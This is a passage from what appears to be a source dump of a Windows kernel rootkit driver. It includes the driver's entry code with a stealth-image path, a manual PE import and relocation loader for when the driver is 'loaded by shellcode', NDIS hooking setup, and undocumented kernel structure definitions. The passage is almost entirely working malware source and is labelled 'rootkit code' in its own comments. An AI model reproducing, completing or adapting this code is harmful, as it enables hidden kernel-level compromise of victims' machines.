    DbgMsg(__FUNCTION__"(): Loaded at "IFMT"\n", m_DriverBase);

    // initialize NDIS structures offsets
    NdisHookInitialize(NULL);

#ifdef USE_STEALTH_IMAGE

    if (m_DriverBase == NULL)
    {
        return STATUS_UNSUCCESSFUL;
    }

    PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)((PUCHAR)m_DriverBase +
        ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew);

    PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)
        (pHeaders->FileHeader.SizeOfOptionalHeader +
        (PUCHAR)&pHeaders->OptionalHeader);

    // calculate size, that require for rootkit code
    for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)
    {
        if (m_RkOffset == 0)
        {
            // RVA of the first section: start of the region that gets copied
            m_RkOffset = pSection->VirtualAddress;
        }

        if (pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE)
        {
            // erase discardable flag from our driver sections
            // (these sections are not counted in m_RkSize)
            pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE;
        }
        else
        {
            m_RkSize += MY_ALIGN_UP(
                pSection->Misc.VirtualSize,
                pHeaders->OptionalHeader.SectionAlignment
            );
        }

        pSection += 1;
    }

    DbgMsg("Rootkit code: 0x%x bytes from 0x%.8x\n", m_RkSize, m_RkOffset);

    // to deal with ProcessRelocs()
    pHeaders->OptionalHeader.ImageBase = (ULONG)m_DriverBase;
    m_DriverSize = pHeaders->OptionalHeader.SizeOfImage;

    NTSTATUS ns = PsSetLoadImageNotifyRoutine(LoadImageNotify);
    if (!NT_SUCCESS(ns))
    {
        DbgMsg("PsSetLoadImageNotifyRoutine() fails: 0x%.8x\n", ns);
    }

#else // USE_STEALTH_IMAGE

    DriverEntryInitializePayload(NULL);

    HANDLE hThread = NULL;
    NTSTATUS ns = PsCreateSystemThread(
        &hThread,
        THREAD_ALL_ACCESS,
        NULL, NULL, NULL,
        DriverEntryContinueThread,
        NULL
    );
    if (NT_SUCCESS(ns))
    {
        ZwClose(hThread);
    }
    else
    {
        DbgMsg("PsCreateSystemThread() fails: 0x%.8x\n", ns);
    }

#endif // USE_STEALTH_IMAGE

    return STATUS_SUCCESS;
}
//--------------------------------------------------------------------------------------
// EoF

================================================
FILE: src/rootkit_driver/rootkit_driver.def
================================================

================================================
FILE: src/rootkit_driver/rootkit_driver.h
================================================
extern "C"
{
void ClearWp(void);
void SetWp(void);

PVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup);
}

// Expands to a DoPointerFixup() call and relies on a variable named
// PointerFixup being in scope at the place where the macro is used.
#define RECALCULATE_POINTER(_ptr_) DoPointerFixup((PVOID)(_ptr_), PointerFixup)

================================================
FILE: src/rootkit_driver/rootkit_driver.vcproj
================================================

================================================
FILE: src/rootkit_driver/runtime.cpp
================================================
#include "stdafx.h"
#include "../common/shellcode2_struct.h"

// The runtime helpers listed below are placed in the INIT section of the image.
#pragma alloc_text(INIT, my_strlen)
#pragma alloc_text(INIT, my_strcmp)
#pragma alloc_text(INIT, my_strcpy)
#pragma alloc_text(INIT, my_strlwr)
#pragma alloc_text(INIT, chrlwr_w)
#pragma alloc_text(INIT, EqualUnicodeString_r)
#pragma alloc_text(INIT, RuntimeGetExportAddress)
#pragma alloc_text(INIT, RuntimeGetKernelModuleBase)
#pragma alloc_text(INIT, RuntimeProcessImports)
#pragma alloc_text(INIT, RuntimeInitialize)

#define MAX_IMAGE_NAME_LEN 255

PVOID
m_KernelBase = NULL, m_DriverBase = NULL; //-------------------------------------------------------------------------------------- /** * Implementations of some standard C library functions. */ size_t my_strlen(const char *str) { if (str) { size_t i = 0; for (; str[i] != NULL; i++); return i; } return 0; } int my_strcmp(const char *str_1, const char *str_2) { size_t len_1 = my_strlen(str_1), len_2 = my_strlen(str_2); if (len_1 != len_2) { return 1; } for (size_t i = 0; i < len_1; i++) { if (str_1[i] != str_2[i]) { return 1; } } return 0; } char *my_strcpy(char *str_1, const char *str_2) { size_t len = my_strlen(str_2) + 1; for (size_t i = 0; i < len; i++) { str_1[i] = str_2[i]; } return str_1; } char *my_strlwr(char *str) { char *pos = str; for (; str <= (pos + my_strlen(pos)); str++) { if ((*str >= 'A') && (*str <= 'Z')) { *str = *str + ('a'-'A'); } } return pos; } //-------------------------------------------------------------------------------------- wchar_t chrlwr_w(wchar_t chr) { if ((chr >= 'A') && (chr <= 'Z')) { return chr + ('a'-'A'); } return chr; } BOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive) { USHORT CmpLen = min(Str1->Length, Str2->Length) / sizeof(WCHAR); // compare unicode strings from the end of the buffers for (USHORT i = 1; i < CmpLen; i++) { WCHAR Chr1 = Str1->Buffer[Str1->Length / sizeof(WCHAR) - i], Chr2 = Str2->Buffer[Str2->Length / sizeof(WCHAR) - i]; if (CaseInSensitive) { Chr1 = chrlwr_w(Chr1); Chr2 = chrlwr_w(Chr2); } if (Chr1 != Chr2) { return FALSE; } } return TRUE; } //-------------------------------------------------------------------------------------- PVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName) { PIMAGE_EXPORT_DIRECTORY pExport = NULL; PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if 
(pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) { pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); } } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) { pExport = (PIMAGE_EXPORT_DIRECTORY)RVATOVA(Image, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress); } } else { return NULL; } if (pExport) { PULONG AddressOfFunctions = (PULONG)RVATOVA(Image, pExport->AddressOfFunctions); PSHORT AddrOfOrdinals = (PSHORT)RVATOVA(Image, pExport->AddressOfNameOrdinals); PULONG AddressOfNames = (PULONG)RVATOVA(Image, pExport->AddressOfNames); // enumerate exports for (ULONG i = 0; i < pExport->NumberOfFunctions; i++) { if (!my_strcmp((char *)RVATOVA(Image, AddressOfNames[i]), lpszFunctionName)) { return RVATOVA(Image, AddressOfFunctions[AddrOfOrdinals[i]]); } } } return NULL; } //-------------------------------------------------------------------------------------- BOOLEAN RuntimeProcessImports(PVOID Image, char *ImportedModuleName, PVOID ImportedModuleBase) { PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PIMAGE_IMPORT_DESCRIPTOR pImport = NULL; if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) { pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); } } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)Image + 
((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) { pImport = (PIMAGE_IMPORT_DESCRIPTOR)RVATOVA(Image, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); } } else { return FALSE; } if (pImport) { // enumerate import modules while (pImport->Name != 0) { char szName[MAX_IMAGE_NAME_LEN]; my_strcpy(szName, (char *)RVATOVA(Image, pImport->Name)); if (my_strcmp(my_strlwr(szName), ImportedModuleName)) { // this routine can process only exports from the specified module goto skip_module; } #ifdef _X86_ // process thunk data for 32-bit pointers PIMAGE_THUNK_DATA32 pThunk = (PIMAGE_THUNK_DATA32)RVATOVA(Image, pImport->FirstThunk); #elif _AMD64_ // process thunk data for 64-bit pointers PIMAGE_THUNK_DATA64 pThunk = (PIMAGE_THUNK_DATA64)RVATOVA(Image, pImport->FirstThunk); #endif // enumerate functions of the current module while (pThunk->u1.Ordinal != 0) { PIMAGE_IMPORT_BY_NAME pName = (PIMAGE_IMPORT_BY_NAME)RVATOVA(Image, pThunk->u1.AddressOfData); char *lpszFuncName = (char *)&pName->Name; PVOID FuncAddr = RuntimeGetExportAddress(ImportedModuleBase, lpszFuncName); if (FuncAddr == NULL) { return FALSE; } *(PVOID *)pThunk = FuncAddr; pThunk += 1; } skip_module: pImport += 1; } } return TRUE; } //-------------------------------------------------------------------------------------- BOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase) { PIMAGE_NT_HEADERS32 pHeaders32 = (PIMAGE_NT_HEADERS32) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); PIMAGE_BASE_RELOCATION pRelocation = NULL; ULONG RelocationSize = 0; ULONGLONG OldBase = 0; if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) { // 32-bit image if (pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image, pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); 
RelocationSize = pHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = pHeaders32->OptionalHeader.ImageBase; } else if (pHeaders32->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) { // 64-bit image PIMAGE_NT_HEADERS64 pHeaders64 = (PIMAGE_NT_HEADERS64) ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew); if (pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) { pRelocation = (PIMAGE_BASE_RELOCATION)RVATOVA(Image, pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); RelocationSize = pHeaders64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; } OldBase = pHeaders64->OptionalHeader.ImageBase; } else { return FALSE; } if (pRelocation) { ULONG Size = 0; // enumerate relocation pages while (RelocationSize > Size && pRelocation->SizeOfBlock) { ULONG Number = (pRelocation->SizeOfBlock - 8) / 2; PUSHORT Rel = (PUSHORT)((PUCHAR)pRelocation + 8); // enumerate relocation offsets for the current page for (ULONG i = 0; i < Number; i++) { if (Rel[i] > 0) { USHORT Type = (Rel[i] & 0xF000) >> 12; // check for supporting type if (Type != IMAGE_REL_BASED_HIGHLOW && Type != IMAGE_REL_BASED_DIR64) { return FALSE; } #ifdef _X86_ *(PULONG)(RVATOVA(Image, pRelocation->VirtualAddress + (Rel[i] & 0x0FFF))) += (ULONG)((ULONGLONG)NewBase - OldBase); #elif _AMD64_ *(PULONGLONG)(RVATOVA(Image, pRelocation->VirtualAddress + (Rel[i] & 0x0FFF))) += (ULONGLONG)NewBase - OldBase; #endif } } pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock); Size += pRelocation->SizeOfBlock; } } return TRUE; } //-------------------------------------------------------------------------------------- PVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass) { NTSTATUS ns = STATUS_SUCCESS; ULONG Size = 0x100; PVOID Info = NULL; while (true) { // allocate memory for the system information if ((Info = ExAllocatePool(NonPagedPool, Size)) == 
NULL) { DbgMsg("ExAllocatePool() fails\n"); return NULL; } ULONG RetSize = 0; ns = ZwQuerySystemInformation(InfoClass, Info, Size, &RetSize); if (ns == STATUS_INFO_LENGTH_MISMATCH) { ExFreePool(Info); Info = NULL; if (RetSize > 0) { // need more memory Size = RetSize + 0x100; } else { break; } } else { break; } } if (!NT_SUCCESS(ns)) { DbgMsg("ZwQuerySystemInformation() fails; status: 0x%.8x\n", ns); if (Info) { // cleanup on error ExFreePool(Info); } return NULL; } return Info; } //-------------------------------------------------------------------------------------- PVOID RuntimeGetKernelModuleBase(char *ModuleName) { PVOID pModuleBase = NULL; UNICODE_STRING usCommonHalName, usCommonNtName; RtlInitUnicodeString(&usCommonHalName, L"hal.dll"); RtlInitUnicodeString(&usCommonNtName, L"ntoskrnl.exe"); #define HAL_NAMES_NUM 6 wchar_t *wcHalNames[] = { L"hal.dll", // Non-ACPI PIC HAL L"halacpi.dll", // ACPI PIC HAL L"halapic.dll", // Non-ACPI APIC UP HAL L"halmps.dll", // Non-ACPI APIC MP HAL L"halaacpi.dll", // ACPI APIC UP HAL L"halmacpi.dll" // ACPI APIC MP HAL }; #define NT_NAMES_NUM 4 wchar_t *wcNtNames[] = { L"ntoskrnl.exe", // UP L"ntkrnlpa.exe", // UP PAE L"ntkrnlmp.exe", // MP L"ntkrpamp.exe" // MP PAE }; PRTL_PROCESS_MODULES Info = (PRTL_PROCESS_MODULES)RuntimeGetSystemInformation(SystemModuleInformation); if (Info) { ANSI_STRING asModuleName; UNICODE_STRING usModuleName; RtlInitAnsiString(&asModuleName, ModuleName); NTSTATUS ns = RtlAnsiStringToUnicodeString(&usModuleName, &asModuleName, TRUE); if (NT_SUCCESS(ns)) { for (ULONG i = 0; i < Info->NumberOfModules; i++) { ANSI_STRING asEnumModuleName; UNICODE_STRING usEnumModuleName; RtlInitAnsiString( &asEnumModuleName, (char *)Info->Modules[i].FullPathName + Info->Modules[i].OffsetToFileName ); NTSTATUS ns = RtlAnsiStringToUnicodeString(&usEnumModuleName, &asEnumModuleName, TRUE); if (NT_SUCCESS(ns)) { if (RtlEqualUnicodeString(&usModuleName, &usCommonHalName, TRUE)) { // hal.dll passed as module name for (int 
i_m = 0; i_m < HAL_NAMES_NUM; i_m++) { UNICODE_STRING usHalName; RtlInitUnicodeString(&usHalName, wcHalNames[i_m]); // compare module name from list with known HAL module name if (RtlEqualUnicodeString(&usEnumModuleName, &usHalName, TRUE)) { pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (RtlEqualUnicodeString(&usModuleName, &usCommonNtName, TRUE)) { // ntoskrnl.exe passed as module name for (int i_m = 0; i_m < NT_NAMES_NUM; i_m++) { UNICODE_STRING usNtName; RtlInitUnicodeString(&usNtName, wcNtNames[i_m]); // compare module name from list with known kernel module name if (RtlEqualUnicodeString(&usEnumModuleName, &usNtName, TRUE)) { pModuleBase = (PVOID)Info->Modules[i].ImageBase; break; } } } else if (RtlEqualUnicodeString(&usModuleName, &usEnumModuleName, TRUE)) { pModuleBase = (PVOID)Info->Modules[i].ImageBase; } RtlFreeUnicodeString(&usEnumModuleName); if (pModuleBase) { // module is found break; } } } RtlFreeUnicodeString(&usModuleName); } ExFreePool(Info); } return pModuleBase; } //-------------------------------------------------------------------------------------- BOOLEAN RuntimeInitialize( PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) { if (DriverObject == NULL) { /** * Driver has been loaded by shellcode. * RegistryPath - pointer to the SC_PARAMS */ PSC_PARAMS ShellcodeParams = (PSC_PARAMS)RegistryPath; // parse image relocations if (!RuntimeProcessRelocs( ShellcodeParams->rootkit_base, ShellcodeParams->rootkit_base)) { return FALSE; } /* Safe to use global variables here. */ m_KernelBase = ShellcodeParams->kernel_base; m_DriverBase = ShellcodeParams->rootkit_base; // parse image imports (kernel) if (!RuntimeProcessImports( ShellcodeParams->rootkit_base, "ntoskrnl.exe", ShellcodeParams->kernel_base)) { return FALSE; } /* Safe to use kernel imports here. 
*/ DbgMsg(__FUNCTION__"(): Kernel base is "IFMT"\n", m_KernelBase); PVOID NdisBase = RuntimeGetKernelModuleBase("ndis.sys"); if (NdisBase) { DbgMsg(__FUNCTION__"(): NDIS base is "IFMT"\n", NdisBase); // parse image imports (NDIS) if (!RuntimeProcessImports( ShellcodeParams->rootkit_base, "ndis.sys", NdisBase)) { return FALSE; } } else { DbgMsg(__FUNCTION__"() ERROR: Unable to locate NDIS\n"); return FALSE; } /* Safe to use all others imports here. */ } // driver has been loaded as usual return TRUE; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_driver/runtime.h ================================================ extern "C" { size_t my_strlen(const char *str); int my_strcmp(const char *str_1, const char *str_2); char *my_strcpy(char *str_1, const char *str_2); char *my_strlwr(char *str); wchar_t chrlwr_w(wchar_t chr); BOOLEAN EqualUnicodeString_r(PUNICODE_STRING Str1, PUNICODE_STRING Str2, BOOLEAN CaseInSensitive); PVOID RuntimeGetSystemInformation(SYSTEM_INFORMATION_CLASS InfoClass); PVOID RuntimeGetKernelModuleBase(char *ModuleName); PVOID RuntimeGetExportAddress(PVOID Image, char *lpszFunctionName); BOOLEAN RuntimeProcessImports(PVOID Image, PVOID KernelAddress); BOOLEAN RuntimeProcessRelocs(PVOID Image, PVOID NewBase); BOOLEAN RuntimeInitialize( PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath ); } ================================================ FILE: src/rootkit_driver/stdafx.h ================================================ #pragma warning(disable: 4200) extern "C" { #include #include #include #include #include "undocnt.h" } #include "debug.h" #include "runtime.h" #include "ndis_hook.h" #include "network.h" #include "rootkit_driver.h" #include "dll_inject.h" #include "../common/common.h" #include "../rootkit_driver_config.h" ================================================ FILE: src/rootkit_driver/undocnt.h 
================================================ // ******************************************************** // some user-mode structures typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; ULONG Flags; USHORT LoadCount; USHORT TlsIndex; LIST_ENTRY HashLinks; PVOID SectionPointer; ULONG CheckSum; ULONG TimeDateStamp; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; typedef struct _PEB_LDR_DATA { ULONG Length; BOOLEAN Initialized; PVOID SsHandle; LIST_ENTRY ModuleListLoadOrder; LIST_ENTRY ModuleListMemoryOrder; LIST_ENTRY ModuleListInitOrder; } PEB_LDR_DATA, *PPEB_LDR_DATA; // ******************************************************** typedef struct SERVICE_DESCRIPTOR_ENTRY { PVOID *ServiceTableBase; PULONG ServiceCounterTableBase; ULONG NumberOfServices; PUCHAR ParamTableBase; } SERVICE_DESCRIPTOR_ENTRY, *PSERVICE_DESCRIPTOR_ENTRY; typedef struct _SERVICE_DESCRIPTOR_TABLE { SERVICE_DESCRIPTOR_ENTRY Entry[2]; } SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE; typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, // obsolete...delete SystemPerformanceInformation, SystemTimeOfDayInformation, SystemPathInformation, SystemProcessInformation, SystemCallCountInformation, SystemDeviceInformation, SystemProcessorPerformanceInformation, SystemFlagsInformation, SystemCallTimeInformation, SystemModuleInformation, SystemLocksInformation, SystemStackTraceInformation, SystemPagedPoolInformation, SystemNonPagedPoolInformation, SystemHandleInformation, SystemObjectInformation, SystemPageFileInformation, SystemVdmInstemulInformation, SystemVdmBopInformation, SystemFileCacheInformation, SystemPoolTagInformation, SystemInterruptInformation, SystemDpcBehaviorInformation, SystemFullMemoryInformation, SystemLoadGdiDriverInformation, 
SystemUnloadGdiDriverInformation, SystemTimeAdjustmentInformation, SystemSummaryMemoryInformation, SystemMirrorMemoryInformation, SystemPerformanceTraceInformation, SystemObsolete0, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation, SystemExtendServiceTableInformation, SystemPrioritySeperation, SystemVerifierAddDriverInformation, SystemVerifierRemoveDriverInformation, SystemProcessorIdleInformation, SystemLegacyDriverInformation, SystemCurrentTimeZoneInformation, SystemLookasideInformation, SystemTimeSlipNotification, SystemSessionCreate, SystemSessionDetach, SystemSessionInformation, SystemRangeStartInformation, SystemVerifierInformation, SystemVerifierThunkExtend, SystemSessionProcessInformation, SystemLoadGdiDriverInSystemSpace, SystemNumaProcessorMap, SystemPrefetcherInformation, SystemExtendedProcessInformation, SystemRecommendedSharedDataAlignment, SystemComPlusPackage, SystemNumaAvailableMemory, SystemProcessorPowerInformation, SystemEmulationBasicInformation, SystemEmulationProcessorInformation, SystemExtendedHandleInformation, SystemLostDelayedWriteInformation, SystemBigPoolInformation, SystemSessionPoolTagInformation, SystemSessionMappedViewInformation, SystemHotpatchInformation, SystemObjectSecurityMode, SystemWatchdogTimerHandler, SystemWatchdogTimerInformation, SystemLogicalProcessorInformation, SystemWow64SharedInformation, SystemRegisterFirmwareTableInformationHandler, SystemFirmwareTableInformation, SystemModuleInformationEx, SystemVerifierTriageInformation, SystemSuperfetchInformation, SystemMemoryListInformation, SystemFileCacheInformationEx, MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum } SYSTEM_INFORMATION_CLASS; typedef struct _RTL_PROCESS_MODULE_INFORMATION { HANDLE Section; // Not filled in PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT 
LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[ 256 ]; } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; typedef struct _RTL_PROCESS_MODULES { ULONG NumberOfModules; RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ]; } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess; } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ]; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef struct _FILE_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; WCHAR FileName[1]; } FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; typedef struct _FILE_FULL_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; WCHAR FileName[1]; } FILE_FULL_DIRECTORY_INFORMATION, *PFILE_FULL_DIRECTORY_INFORMATION; typedef struct _FILE_BOTH_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG Unknown; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaInformationLength; UCHAR AlternateNameLength; WCHAR AlternateName[12]; WCHAR FileName[1]; } FILE_BOTH_DIRECTORY_INFORMATION, *PFILE_BOTH_DIRECTORY_INFORMATION; typedef struct 
_FILE_NAMES_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; ULONG FileNameLength; WCHAR FileName[1]; } FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION; typedef struct _FILE_ID_BOTH_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; CCHAR ShortNameLength; WCHAR ShortName[12]; LARGE_INTEGER FileId; WCHAR FileName[1]; } FILE_ID_BOTH_DIRECTORY_INFORMATION, *PFILE_ID_BOTH_DIRECTORY_INFORMATION; typedef struct _FILE_ID_FULL_DIRECTORY_INFORMATION { ULONG NextEntryOffset; ULONG FileIndex; LARGE_INTEGER CreationTime; LARGE_INTEGER LastAccessTime; LARGE_INTEGER LastWriteTime; LARGE_INTEGER ChangeTime; LARGE_INTEGER EndOfFile; LARGE_INTEGER AllocationSize; ULONG FileAttributes; ULONG FileNameLength; ULONG EaSize; LARGE_INTEGER FileId; WCHAR FileName[1]; } FILE_ID_FULL_DIRECTORY_INFORMATION, *PFILE_ID_FULL_DIRECTORY_INFORMATION; typedef struct _SYSTEM_OBJECT_TYPE_INFORMATION { ULONG NextEntryOffset; ULONG ObjectCount; ULONG HandleCount; ULONG TypeNumber; ULONG InvalidAttributes; GENERIC_MAPPING GenericMapping; ACCESS_MASK ValidAccessMask; POOL_TYPE PoolType; UCHAR Unknown; UNICODE_STRING Name; } SYSTEM_OBJECT_TYPE_INFORMATION, *PSYSTEM_OBJECT_TYPE_INFORMATION; typedef struct _SYSTEM_OBJECT_INFORMATION { ULONG NextEntryOffset; PVOID Object; ULONG CreatorProcessId; USHORT Unknown; USHORT Flags; ULONG PointerCount; ULONG HandleCount; ULONG PagedPoolUsage; ULONG NonPagedPoolUsage; ULONG ExclusiveProcessId; PSECURITY_DESCRIPTOR SecurityDescriptor; UNICODE_STRING Name; } SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION; NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile( HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG FileInformationLength, 
FILE_INFORMATION_CLASS FileInformationClass, BOOLEAN ReturnSingleEntry, PUNICODE_STRING FileName, BOOLEAN RestartScan ); typedef struct _SYSTEM_PROCESS_INFORMATION { ULONG NextEntryOffset; ULONG NumberOfThreads; LARGE_INTEGER SpareLi1; LARGE_INTEGER SpareLi2; LARGE_INTEGER SpareLi3; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; UNICODE_STRING ImageName; KPRIORITY BasePriority; HANDLE UniqueProcessId; HANDLE InheritedFromUniqueProcessId; ULONG HandleCount; ULONG SessionId; ULONG_PTR PageDirectoryBase; SIZE_T PeakVirtualSize; SIZE_T VirtualSize; ULONG PageFaultCount; SIZE_T PeakWorkingSetSize; SIZE_T WorkingSetSize; SIZE_T QuotaPeakPagedPoolUsage; SIZE_T QuotaPagedPoolUsage; SIZE_T QuotaPeakNonPagedPoolUsage; SIZE_T QuotaNonPagedPoolUsage; SIZE_T PagefileUsage; SIZE_T PeakPagefileUsage; SIZE_T PrivatePageCount; LARGE_INTEGER ReadOperationCount; LARGE_INTEGER WriteOperationCount; LARGE_INTEGER OtherOperationCount; LARGE_INTEGER ReadTransferCount; LARGE_INTEGER WriteTransferCount; LARGE_INTEGER OtherTransferCount; } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION; typedef struct THREAD_BASIC_INFORMATION { NTSTATUS ExitStatus; PVOID TebBaseAddress; CLIENT_ID ClientId; KAFFINITY AffinityMask; KPRIORITY Priority; KPRIORITY BasePriority; } THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION; typedef enum { StateInitialized, StateReady, StateRunning, StateStandby, StateTerminated, StateWait, StateTransition, StateUnknown } THREAD_STATE; typedef struct _SYSTEM_THREAD { LARGE_INTEGER KernelTime; LARGE_INTEGER UserTime; LARGE_INTEGER CreateTime; ULONG WaitTime; PVOID StartAddress; CLIENT_ID ClientId; KPRIORITY Priority; KPRIORITY BasePriority; ULONG ContextSwitchCount; THREAD_STATE State; KWAIT_REASON WaitReason; } SYSTEM_THREAD, *PSYSTEM_THREAD; typedef struct _SYSTEM_PROCESSES_INFORMATION { ULONG NextEntryDelta; ULONG ThreadCount; ULONG Reserved1[6]; LARGE_INTEGER CreateTime; LARGE_INTEGER UserTime; LARGE_INTEGER KernelTime; 
